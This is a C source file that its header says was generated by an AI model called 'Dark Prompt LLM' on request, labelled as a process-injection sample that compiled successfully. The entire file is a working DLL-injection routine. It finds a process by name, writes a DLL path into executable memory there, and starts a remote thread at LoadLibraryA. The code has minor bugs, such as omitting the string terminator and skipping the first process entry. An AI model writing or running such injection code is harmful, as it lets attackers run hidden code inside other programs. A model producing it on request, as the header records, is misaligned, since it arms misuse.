/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 04:37:22
 * Category: ProcessInjection
 * Prompt: Generate a process injection routine in C using CreateRemoteThread
 * Compile Status: SUCCESS
 * Sample: 3
 * ============================================================
 */
 
#include <windows.h>
#include <tlhelp32.h>

void inject(const char* path, const char* procName)
{
    HANDLE hProc = NULL;
    DWORD procId = 0;

    PROCESSENTRY32 pe = { sizeof(pe) };
    HANDLE snapshot = CreateToolHelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (snapshot == INVALID_HANDLE_VALUE)
        return;

    if (!Process32First(snapshot, &pe))
        goto done;

    while (Process32Next(snapshot, &pe))
    {
        if (strcmp(procName, pe.szExeFile) != 0)
            continue;

        procId = pe.th32ProcessID;
        break;
    }

    CloseHandle(snapshot);
done:

    if (procId == 0 || !(hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, procId)))
        return;

    LPVOID dllPath = VirtualAllocEx(hProc, NULL, strlen(path), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc, dllPath, path, strlen(path), NULL);

    HMODULE kernel32 = GetModuleHandle("kernel32.dll");
    void* loadLibraryA = GetProcAddress(kernel32, "LoadLibraryA");

    HANDLE thread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibraryA, dllPath, 0, NULL);
    WaitForSingleObject(thread, INFINITE);

    CloseHandle(thread);
    CloseHandle(hProc);
}

int main(int argc, char** argv)
{
    inject(argv[1], argv[2]);
}